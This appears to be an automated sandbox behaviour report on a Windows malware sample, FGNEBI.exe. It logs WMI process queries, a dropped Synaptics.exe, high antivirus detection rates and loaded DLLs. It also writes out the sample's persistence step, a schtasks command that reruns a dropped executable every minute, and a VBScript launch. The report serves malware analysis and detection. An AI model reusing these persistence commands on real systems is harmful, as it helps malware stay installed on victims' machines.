Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'

Source: C:\Users\user\Desktop\FGNEBI.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FGNEBI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FGNEBI.exe	ReversingLabs: Detection: 92%
Source: FGNEBI.exe	Virustotal: Detection: 87%

Source: C:\Users\user\Desktop\FGNEBI.exe

File read: C:\Users\user\Desktop\FGNEBI.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FGNEBI.exe "C:\Users\user\Desktop\FGNEBI.exe"
Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe"
Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1	Jump to behavior

Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
